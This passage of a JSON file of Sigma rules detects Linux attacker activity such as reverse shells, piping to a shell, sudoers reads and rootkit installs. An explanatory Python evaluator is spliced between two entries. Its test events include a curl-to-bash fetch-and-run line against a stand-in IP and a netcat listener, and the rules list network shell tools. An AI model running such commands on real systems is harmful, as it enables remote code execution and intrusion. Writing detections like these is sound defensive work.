    "content": "title: Potential Container Discovery Via Inodes Listing\nid: 43e26eb5-cd58-48d1-8ce9-a273f5d298d8\nstatus: test\ndescription: Detects listing of the inode of the \"/\" directory to determine whether the current process is running inside a container.\nreferences:\n    - https://blog.skyplabs.net/posts/container-detection/\n    - https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker\ntags:\n    - attack.discovery\n    - attack.t1082\nauthor: Seth Hanford\ndate: 2023-08-23\nmodified: 2025-11-24\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_ls_img:\n        Image|endswith: '/ls'    # the inode number of / is low (typically 2) on a host root filesystem and high inside a container\n    selection_ls_cli:\n        - CommandLine|endswith: ' /'\n        - CommandLine|contains: ' / '\n    selection_regex_inode:\n        CommandLine|re: '(?:\\s-[^-\\s]{0,20}i|\\s--inode\\s)'      # -i prints the inode number (also matches combined short flags such as -li)\n    selection_regex_dir:\n        CommandLine|re: '(?:\\s-[^-\\s]{0,20}d|\\s--directory\\s)'  # -d lists the directory itself, not its contents\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate system administrator usage of these commands\n    - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml",
    "content": "title: Interactive Bash Suspicious Children\nid: ea3ecad2-db86-4a89-ad0b-132a10d2db55\nstatus: test\ndescription: Detects suspicious interactive bash as a parent to rather uncommon child processes\nreferences:\n    - Internal Research\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-03-14\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1059.004\n    - attack.t1036\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        ParentCommandLine: 'bash -i'\n    anomaly1:\n        CommandLine|contains:\n            - '-c import '\n            - 'base64'\n            - 'pty.spawn'\n    anomaly2:\n        Image|endswith:\n            - 'whoami'\n            - 'iptables'\n            - '/ncat'\n            - '/nc'\n            - '/netcat'\n    condition: selection and 1 of anomaly*\nfalsepositives:\n    - Legitimate software that uses these patterns\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_susp_java_children.yml",
    "content": "title: Suspicious Java Children Processes\nid: d292e0af-9a18-420c-9525-ec0ac3936892\nstatus: test\ndescription: Detects java process spawning suspicious children\nreferences:\n    - https://www.tecmint.com/different-types-of-linux-shells/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-03\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        ParentImage|endswith: '/java'\n        CommandLine|contains:\n            - '/bin/sh'\n            - 'bash'\n            - 'dash'\n            - 'ksh'\n            - 'zsh'\n            - 'csh'\n            - 'fish'\n            - 'curl'\n            - 'wget'\n            - 'python'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_susp_network_utilities_execution.yml",
    "content": "title: Linux Network Service Scanning Tools Execution\nid: 3e102cd9-a70d-4a7a-9508-403963092f31\nstatus: test\ndescription: Detects execution of network scanning and reconnaissance tools. These tools can be used, for example, to enumerate local or remote network services.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md\n    - https://github.com/projectdiscovery/naabu\n    - https://github.com/Tib3rius/AutoRecon\nauthor: Alejandro Ortuno, oscd.community, Georg Lauenstein (sure[secure])\ndate: 2020-10-21\nmodified: 2024-09-19\ntags:\n    - attack.discovery\n    - attack.t1046\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_netcat:\n        Image|endswith:\n            - '/nc'\n            - '/ncat'\n            - '/netcat'\n            - '/socat'\n    selection_network_scanning_tools:\n        Image|endswith:\n            - '/autorecon'\n            - '/hping'\n            - '/hping2'\n            - '/hping3'\n            - '/naabu'\n            - '/nmap'\n            - '/nping'\n            - '/telnet' # Could equally be wget, curl, ssh or anything else able to open a network connection. Consider fine tuning\n            - '/zenmap'\n    filter_main_netcat_listen_flag:\n        CommandLine|contains:\n            # Note: combined short flags such as ' -lvnp ' do not contain ' -l ' and are therefore not filtered out\n            - ' --listen '\n            - ' -l '\n    condition: (selection_netcat and not filter_main_netcat_listen_flag) or selection_network_scanning_tools\nfalsepositives:\n    - Legitimate administration activities\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml",
    "content": "title: Linux Shell Pipe to Shell\nid: 880973f3-9708-491c-a77b-2a35a1921158\nstatus: test\ndescription: Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell\nreferences:\n    - Internal Research\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-03-14\nmodified: 2022-07-26\ntags:\n    - attack.defense-evasion\n    - attack.t1140\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|startswith:\n            - 'sh -c '\n            - 'bash -c '\n    selection_exec:\n        - CommandLine|contains:\n              - '| bash '\n              - '| sh '\n              - '|bash '\n              - '|sh '\n        - CommandLine|endswith:\n              - '| bash'\n              - '| sh'\n              - '|bash'\n              - ' |sh'\n    condition: all of selection*\nfalsepositives:\n    - Legitimate software that uses these patterns\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_susp_process_reading_sudoers.yml",
    "content": "title: Access of Sudoers File Content\nid: 0f79c4d2-4e1f-4683-9c36-b5469a665e06\nstatus: test\ndescription: Detects the execution of text-based file access or inspection utilities to read the content of /etc/sudoers, for example to list all users that have sudo rights.\nreferences:\n    - https://github.com/sleventyeleven/linuxprivchecker/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-06-20\nmodified: 2025-06-04\ntags:\n    - attack.reconnaissance\n    - attack.t1592.004\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith:\n            - '/cat'\n            - '/ed'\n            - '/egrep'\n            - '/emacs'\n            - '/fgrep'\n            - '/grep'\n            - '/head'\n            - '/less'\n            - '/more'\n            - '/nano'\n            - '/tail'\n        CommandLine|contains: ' /etc/sudoers'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_susp_recon_indicators.yml",
    "content": "title: Linux Recon Indicators\nid: 0cf7a157-8879-41a2-8f55-388dd23746b7\nstatus: test\ndescription: Detects events with patterns found in commands used for reconnaissance on linux systems\nreferences:\n    - https://github.com/sleventyeleven/linuxprivchecker/blob/0d701080bbf92efd464e97d71a70f97c6f2cd658/linuxprivchecker.py\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-06-20\ntags:\n    - attack.reconnaissance\n    - attack.t1592.004\n    - attack.credential-access\n    - attack.t1552.001\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        CommandLine|contains:\n            - ' -name .htpasswd'\n            - ' -perm -4000 '\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_susp_sensitive_file_access.yml",
    "content": "title: Potential Suspicious Change To Sensitive/Critical Files\nid: 86157017-c2b1-4d4a-8c33-93b8e67e4af4\nstatus: test\ndescription: Detects changes to sensitive and critical files on a Linux system, i.e. files that are not expected to change outside of planned maintenance.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/defender-for-cloud/file-integrity-monitoring-overview#which-files-should-i-monitor\nauthor: '@d4ns4n_ (Wuerth-Phoenix)'\ndate: 2023-05-30\ntags:\n    - attack.impact\n    - attack.t1565.001\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_img_1:\n        Image|endswith:\n            - '/cat'\n            - '/echo'\n            - '/grep'\n            - '/head'\n            - '/more'\n            - '/tail'\n        CommandLine|contains: '>'\n    selection_img_2:\n        Image|endswith:\n            - '/emacs'\n            - '/nano'\n            - '/sed'\n            - '/vi'\n            - '/vim'\n    selection_paths:\n        CommandLine|contains:\n            - '/bin/login'\n            - '/bin/passwd'\n            - '/boot/'\n            - '/etc/*.conf'\n            - '/etc/cron.' # Covers the different cron config directories \"daily\", \"hourly\", etc.\n            - '/etc/crontab'\n            - '/etc/hosts'\n            - '/etc/init.d'\n            - '/etc/sudoers'\n            - '/opt/bin/'\n            - '/sbin' # Covers: '/opt/sbin', '/usr/local/sbin/', '/usr/sbin/'\n            - '/usr/bin/'\n            - '/usr/local/bin/'\n    condition: 1 of selection_img_* and selection_paths\nfalsepositives:\n    - Some false positives are to be expected on user or administrator machines. Apply additional filters as needed.\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_susp_shell_child_process_from_parent_tmp_folder.yml",
    "content": "title: Shell Execution Of Process Located In Tmp Directory\nid: 2fade0b6-7423-4835-9d4f-335b39b83867\nstatus: test\ndescription: Detects execution of shells from a parent process located in a temporary (/tmp) directory\nreferences:\n    - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html\n    - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/\n    - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection\n    - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2023-06-02\ntags:\n    - attack.execution\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        ParentImage|startswith: '/tmp/'\n        Image|endswith:\n            - '/bash'\n            - '/csh'\n            - '/dash'\n            - '/fish'\n            - '/ksh'\n            - '/sh'\n            - '/zsh'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_susp_shell_script_exec_from_susp_location.yml",
    "content": "title: Execution Of Script Located In Potentially Suspicious Directory\nid: 30bcce26-51c5-49f2-99c8-7b59e3af36c7\nstatus: test\ndescription: Detects executions of scripts located in potentially suspicious locations such as \"/tmp\" via a shell such as \"bash\", \"sh\", etc.\nreferences:\n    - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html\n    - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/\n    - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection\n    - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2023-06-02\ntags:\n    - attack.execution\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection_img:\n        Image|endswith:\n            - '/bash'\n            - '/csh'\n            - '/dash'\n            - '/fish'\n            - '/ksh'\n            - '/sh'\n            - '/zsh'\n    selection_flag:\n        CommandLine|contains: ' -c '\n    selection_paths:\n        # Note: Add more suspicious paths\n        CommandLine|contains: '/tmp/'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_system_info_discovery.yml",
    "content": "title: System Information Discovery\nid: 42df45e7-e6e9-43b5-8f26-bec5b39cc239\nstatus: stable\ndescription: Detects system information discovery commands\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md\nauthor: Ömer Günal, oscd.community\ndate: 2020-10-08\nmodified: 2021-09-14\ntags:\n    - attack.discovery\n    - attack.t1082\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith:\n            - '/uname'\n            - '/hostname'\n            - '/uptime'\n            - '/lspci'\n            - '/dmidecode'\n            - '/lscpu'\n            - '/lsmod'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: informational\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_system_network_connections_discovery.yml",
    "content": "title: System Network Connections Discovery - Linux\nid: 4c519226-f0cd-4471-bd2f-6fbb2bb68a79\nstatus: test\ndescription: Detects usage of system utilities to discover system network connections\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md\nauthor: Daniil Yugoslavskiy, oscd.community\ndate: 2020-10-19\nmodified: 2023-01-17\ntags:\n    - attack.discovery\n    - attack.t1049\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith:\n            - '/who'\n            - '/w'\n            - '/last'\n            - '/lsof'\n            - '/netstat'\n    filter_landscape_sysinfo:\n        ParentCommandLine|contains: '/usr/bin/landscape-sysinfo'\n        Image|endswith: '/who'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Legitimate activities\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml",
    "content": "title: System Network Discovery - Linux\nid: e7bd1cfa-b446-4c88-8afb-403bcd79e3fa\nstatus: test\ndescription: Detects enumeration of local network configuration\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md\nauthor: Ömer Günal and remotephone, oscd.community\ndate: 2020-10-06\nmodified: 2022-09-15\ntags:\n    - attack.discovery\n    - attack.t1016\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_img:\n        Image|endswith:\n            - '/firewall-cmd'\n            - '/ufw'\n            - '/iptables'\n            - '/netstat'\n            - '/ss'\n            - '/ip'\n            - '/ifconfig'\n            - '/systemd-resolve'\n            - '/route'\n    selection_cli:\n        CommandLine|contains: '/etc/resolv.conf'\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate administration activities\nlevel: informational\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_systemctl_mask_power_settings.yml",
    "content": "title: Mask System Power Settings Via Systemctl\nid: c172b7b5-f3a1-4af2-90b7-822c63df86cb\nstatus: experimental\ndescription: |\n    Detects the use of systemctl mask to disable system power management targets such as suspend, hibernate, or hybrid sleep.\n    Adversaries may mask these targets to prevent a system from entering sleep or shutdown states, ensuring their malicious processes remain active and uninterrupted.\n    This behavior can be associated with persistence or defense evasion, as it impairs normal system power operations to maintain long-term access or avoid termination of malicious activity.\nauthor: Milad Cheraghi, Nasreddine Bencherchali\ndate: 2025-10-17\nreferences:\n    - https://www.man7.org/linux/man-pages/man1/systemctl.1.html\n    - https://linux-audit.com/systemd/faq/what-is-the-difference-between-systemctl-disable-and-systemctl-mask/\ntags:\n    - attack.persistence\n    - attack.impact\n    - attack.t1653\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_systemctl:\n        Image|endswith: '/systemctl'\n        CommandLine|contains: ' mask'\n    selection_power_options:\n        CommandLine|contains:\n            - 'suspend.target'\n            - 'hibernate.target'\n            - 'hybrid-sleep.target'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_touch_susp.yml",
    "content": "title: Touch Suspicious Service File\nid: 31545105-3444-4584-bebf-c466353230d2\nstatus: test\ndescription: Detects usage of \"touch\" with the \"-t\" flag to set the timestamp of a \".service\" unit file (timestomping).\nreferences:\n    - https://blogs.blackberry.com/\n    - https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2023-01-11\ntags:\n    - attack.defense-evasion\n    - attack.t1070.006\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/touch'\n        CommandLine|contains: ' -t '\n        CommandLine|endswith: '.service'\n    condition: selection\nfalsepositives:\n    - Admin changing the date of files.\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml",
    "content": "title: Triple Cross eBPF Rootkit Execve Hijack\nid: 0326c3c8-7803-4a0f-8c5c-368f747f7c3e\nstatus: test\ndescription: Detects execution of the file \"execve_hijack\", which is used by the Triple Cross rootkit as a way to elevate privileges\nreferences:\n    - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-05\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/sudo'\n        CommandLine|contains: 'execve_hijack'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml",
    "content": "title: Triple Cross eBPF Rootkit Install Commands\nid: 22236d75-d5a0-4287-bf06-c93b1770860f\nstatus: test\ndescription: Detects default install commands of the Triple Cross eBPF rootkit based on the \"deployer.sh\" script\nreferences:\n    - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-05\ntags:\n    - attack.defense-evasion\n    - attack.t1014\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/sudo'\n        CommandLine|contains|all:\n            - ' tc '\n            - ' enp0s3 '\n        CommandLine|contains:\n            - ' qdisc '\n            - ' filter '\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_userdel.yml",
    "content": "title: User Has Been Deleted Via Userdel\nid: 08f26069-6f80-474b-8d1f-d971c6fedea0\nstatus: test\ndescription: Detects execution of the \"userdel\" binary, which is used to delete a user account and its related files. This is sometimes abused by threat actors in order to cover their tracks\nreferences:\n    - https://linuxize.com/post/how-to-delete-group-in-linux/\n    - https://www.cyberciti.biz/faq/linux-remove-user-command/\n    - https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/\n    - https://linux.die.net/man/8/userdel\nauthor: Tuan Le (NCSGroup)\ndate: 2022-12-26\ntags:\n    - attack.impact\n    - attack.t1531\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/userdel'\n    condition: selection\nfalsepositives:\n    - Legitimate administrator activities\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_usermod_susp_group.yml",
    "content": "title: User Added To Root/Sudoers Group Using Usermod\nid: 6a50f16c-3b7b-42d1-b081-0fdd3ba70a73\nstatus: test\ndescription: Detects usage of the \"usermod\" binary to add users to the root or sudoers groups\nreferences:\n    - https://pberba.github.io/security/2021/11/23/linux-threat-hunting-for-persistence-account-creation-manipulation/\n    - https://www.configserverfirewall.com/ubuntu-linux/ubuntu-add-user-to-root-group/\nauthor: TuanLe (GTSC)\ndate: 2022-12-21\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/usermod'\n        CommandLine|contains:\n            # Note: the privileged group is commonly named sudo (Debian/Ubuntu) or wheel (RHEL/Fedora) rather than sudoers; extend this list for your environment\n            - '-aG root'\n            - '-aG sudoers'\n    condition: selection\nfalsepositives:\n    - Legitimate administrator activities\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_vim_shell_execution.yml",
    "content": "title: Vim GTFOBin Abuse - Linux\nid: 7ab8f73a-fcff-428b-84aa-6a5ff7877dea\nstatus: test\ndescription: |\n    Detects the use of \"vim\" and its sibling commands to execute a shell or proxy commands.\n    Such behavior may be associated with privilege escalation, unauthorized command execution, or attempts to break out of restricted environments.\nreferences:\n    - https://gtfobins.github.io/gtfobins/vim/\n    - https://gtfobins.github.io/gtfobins/rvim/\n    - https://gtfobins.github.io/gtfobins/vimdiff/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-28\nmodified: 2024-09-02\ntags:\n    - attack.discovery\n    - attack.t1083\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_img:\n        Image|endswith:\n            - '/rvim'\n            - '/vim'\n            - '/vimdiff'\n        CommandLine|contains:\n            - ' --cmd'\n            - ' -c '\n    selection_cli:\n        CommandLine|contains:\n            - ':!/'\n            - ':lua '\n            - ':py '\n            - '/bin/bash'\n            - '/bin/dash'\n            - '/bin/fish'\n            - '/bin/sh'\n            - '/bin/zsh'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml",
    "content": "title: Linux Webshell Indicators\nid: 818f7b24-0fba-4c49-a073-8b755573b9c7\nstatus: test\ndescription: Detects suspicious sub processes of web server processes\nreferences:\n    - https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/\n    - https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-10-15\nmodified: 2022-12-28\ntags:\n    - attack.persistence\n    - attack.t1505.003\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection_general:\n        ParentImage|endswith:\n            - '/httpd'\n            - '/lighttpd'\n            - '/nginx'\n            - '/apache2'\n            - '/node'\n            - '/caddy'\n    selection_tomcat:\n        ParentCommandLine|contains|all:\n            - '/bin/java'\n            - 'tomcat'\n    selection_websphere:  # ? just guessing\n        ParentCommandLine|contains|all:\n            - '/bin/java'\n            - 'websphere'\n    sub_processes:\n        Image|endswith:\n            - '/whoami'\n            - '/ifconfig'\n            - '/ip'\n            - '/bin/uname'\n            - '/bin/cat'\n            - '/bin/crontab'\n            - '/hostname'\n            - '/iptables'\n            - '/netstat'\n            - '/pwd'\n            - '/route'\n    condition: 1 of selection_* and sub_processes\nfalsepositives:\n    - Web applications that invoke Linux command line tools\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_wget_download_suspicious_directory.yml",
    "content": "title: Download File To Potentially Suspicious Directory Via Wget\nid: cf610c15-ed71-46e1-bdf8-2bd1a99de6c4\nstatus: test\ndescription: Detects the use of wget to download content to a suspicious directory\nreferences:\n    - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html\n    - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/\n    - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection\n    - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2023-06-02\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_img:\n        Image|endswith: '/wget'\n    selection_output:\n        - CommandLine|re: '\\s-O\\s' # We use regex to ensure a case sensitive argument detection\n        - CommandLine|contains: '--output-document'\n    selection_path:\n        CommandLine|contains: '/tmp/'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
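Several of the rules above combine more than one selection: "Linux Shell Pipe to Shell" (two selections, one of them a list of maps), "Linux Network Service Scanning Tools Execution" (a selection minus a listen-flag filter), "Download File To Potentially Suspicious Directory Via Wget" (a case-sensitive `re` modifier beside a case-insensitive `contains`) and "Potential Container Discovery Via Inodes Listing" (regexes that cope with combined short flags). The following is an added example, not code from the Sigma project or from pySigma: a minimal Python evaluator for the subset of Sigma modifiers those four rules use, with the rules transcribed as dicts and run over constructed process_creation events. The `proc()` helper, the sample command lines and the 203.0.113.0/24 addresses are made up for the example; conditions are written as Python callables because the evaluator does not parse Sigma condition strings.

```python
import re

# Added example (not Sigma project or pySigma code): evaluator for the Sigma subset
# used by the process_creation rules on this page. Supports contains/startswith/
# endswith/re, the |all variant, list-valued patterns (OR), list-of-maps selections
# (OR) and Sigma's default case-insensitive matching for plain string modifiers.
# Not supported: wildcards such as '/etc/*.conf' and condition-string parsing.


def _as_list(value):
    return value if isinstance(value, list) else [value]


def match_field(event, spec, pattern):
    """Evaluate one 'Field|modifier' entry of a selection against an event."""
    field, *mods = spec.split("|")
    want_all = "all" in mods
    mod = next((m for m in mods if m != "all"), "equals")
    value = str(event.get(field, ""))
    hits = []
    for pat in _as_list(pattern):
        if mod == "re":
            # 're' is the only case-sensitive match; this is why the wget rule uses
            # a regex for '-O' (output file) so that '-o' (log file) does not match.
            hits.append(re.search(pat, value) is not None)
        else:
            v, p = value.lower(), pat.lower()
            hits.append({"equals": v == p, "contains": p in v,
                         "startswith": v.startswith(p), "endswith": v.endswith(p)}[mod])
    return all(hits) if want_all else any(hits)


def match_selection(event, selection):
    """A map is AND across its fields; a list of maps is OR across the items."""
    if isinstance(selection, list):
        return any(match_selection(event, item) for item in selection)
    return all(match_field(event, spec, pat) for spec, pat in selection.items())


def evaluate(rule, event):
    """True when the rule's condition holds for the event."""
    results = {name: match_selection(event, sel) for name, sel in rule["detection"].items()}
    return bool(rule["condition"](results))


# 'Linux Shell Pipe to Shell' -- condition: all of selection*
PIPE_TO_SHELL = {
    "detection": {
        "selection": {"CommandLine|startswith": ["sh -c ", "bash -c "]},
        "selection_exec": [
            {"CommandLine|contains": ["| bash ", "| sh ", "|bash ", "|sh "]},
            {"CommandLine|endswith": ["| bash", "| sh", "|bash", " |sh"]},
        ],
    },
    "condition": lambda r: all(r.values()),
}

# 'Linux Network Service Scanning Tools Execution' -- a selection minus a filter
NETWORK_SCANNING = {
    "detection": {
        "selection_netcat": {"Image|endswith": ["/nc", "/ncat", "/netcat", "/socat"]},
        "selection_network_scanning_tools": {"Image|endswith": [
            "/autorecon", "/hping", "/hping2", "/hping3", "/naabu",
            "/nmap", "/nping", "/telnet", "/zenmap"]},
        "filter_main_netcat_listen_flag": {"CommandLine|contains": [" --listen ", " -l "]},
    },
    "condition": lambda r: ((r["selection_netcat"] and not r["filter_main_netcat_listen_flag"])
                            or r["selection_network_scanning_tools"]),
}

# 'Download File To Potentially Suspicious Directory Via Wget' -- all of selection_*
WGET_TO_TMP = {
    "detection": {
        "selection_img": {"Image|endswith": "/wget"},
        "selection_output": [{"CommandLine|re": r"\s-O\s"},
                             {"CommandLine|contains": "--output-document"}],
        "selection_path": {"CommandLine|contains": "/tmp/"},
    },
    "condition": lambda r: all(r.values()),
}

# 'Potential Container Discovery Via Inodes Listing' -- all of selection_*
INODE_LISTING = {
    "detection": {
        "selection_ls_img": {"Image|endswith": "/ls"},
        "selection_ls_cli": [{"CommandLine|endswith": " /"}, {"CommandLine|contains": " / "}],
        "selection_regex_inode": {"CommandLine|re": r"(?:\s-[^-\s]{0,20}i|\s--inode\s)"},
        "selection_regex_dir": {"CommandLine|re": r"(?:\s-[^-\s]{0,20}d|\s--directory\s)"},
    },
    "condition": lambda r: all(r.values()),
}


def proc(image, cmdline):
    """Constructed process_creation event (sample data, not a captured log)."""
    return {"Image": image, "CommandLine": cmdline}


if __name__ == "__main__":
    samples = [  # constructed command lines; 203.0.113.0/24 is a documentation range
        (PIPE_TO_SHELL, proc("/usr/bin/bash", "bash -c curl -sf http://203.0.113.5/x.sh | bash")),
        (NETWORK_SCANNING, proc("/usr/bin/nc", "nc -l -p 4444")),   # listener: filtered out
        (NETWORK_SCANNING, proc("/usr/bin/nc", "nc -lvnp 4444")),   # combined flags evade ' -l '
        (WGET_TO_TMP, proc("/usr/bin/wget", "wget -o /tmp/wget.log http://203.0.113.5/")),
        (INODE_LISTING, proc("/usr/bin/ls", "ls -lid /")),
    ]
    for rule, event in samples:
        print(evaluate(rule, event), event["CommandLine"])
```

Two of the sample events are worth noting when tuning these rules. `nc -lvnp 4444` is a listener, but because the filter only looks for the literal substrings `' -l '` and `' --listen '`, the combined short flags are not excluded and the event still fires. Conversely, `wget -o /tmp/wget.log` does not fire: `-o` names a log file rather than an output document, and the rule deliberately uses a regex for `-O` because Sigma's plain string modifiers are case-insensitive and would not distinguish the two.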
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_xterm_reverse_shell.yml",
    "content": "title: Potential Xterm Reverse Shell\nid: 4e25af4b-246d-44ea-8563-e42aacab006b\nstatus: test\ndescription: Detects usage of \"xterm\" as a potential reverse shell tunnel\nreferences:\n    - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet\n    - https://www.revshells.com/\nauthor: '@d4ns4n_'\ndate: 2023-04-24\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|contains: 'xterm'\n        CommandLine|contains: '-display'\n        CommandLine|endswith: ':1'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/macos/file_event/file_event_macos_emond_launch_daemon.yml",
